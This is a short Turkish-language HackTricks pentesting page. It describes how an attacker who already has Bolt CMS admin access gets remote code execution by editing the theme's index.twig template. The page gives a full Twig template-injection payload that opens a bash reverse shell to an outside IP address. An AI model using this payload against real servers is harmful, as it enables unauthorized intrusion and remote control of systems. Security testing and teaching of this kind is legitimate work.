# Bolt CMS

<details>

<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> öğrenin!</strong></summary>

HackTricks'ı desteklemenin diğer yolları:

* **Şirketinizi HackTricks'te reklam görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)'da **takip edin**.
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR gönderin.

</details>

## RCE

Yönetici olarak giriş yaptıktan sonra (giriş ekranına erişmek için /bot yolunu izleyin), Bolt CMS'de RCE alabilirsiniz:

* `Configuration` -> `View Configuration` -> `Main Configuration`'ı seçin veya URL yolunu `/bolt/file-edit/config?file=/bolt/config.yaml` olarak ayarlayın
* Tema değerini kontrol edin

<figure><img src="../../.gitbook/assets/image (768).png" alt=""><figcaption></figcaption></figure>

* `File management` -> `View & edit templates`'ı seçin
* Önceki adımda bulunan temel temayı seçin (`base-2021` bu durumda) ve `index.twig`'i seçin
* Benim durumumda bu, URL yolunda /bolt/file-edit/themes?file=/base-2021/index.twig olarak bulunmaktadır
* Payload'ınızı bu dosyaya [template injection (Twig)](../../pentesting-web/ssti-server-side-template-injection/#twig-php) aracılığıyla ayarlayın, örneğin: `{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}`
* Ve değişiklikleri kaydedin

<figure><img src="../../.gitbook/assets/image (945).png" alt=""><figcaption></figcaption></figure>

* `Maintenance` -> `Clear the cache`'de önbelleği temizleyin
* Sayfaya tekrar düzenli bir kullanıcı olarak erişin ve payload'ın çalıştırıldığını görmelisiniz

<details>

<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> öğrenin!</strong></summary>

HackTricks'ı desteklemenin diğer yolları:

* **Şirketinizi HackTricks'te reklam görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)'da **takip edin**.
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR gönderin.

</details>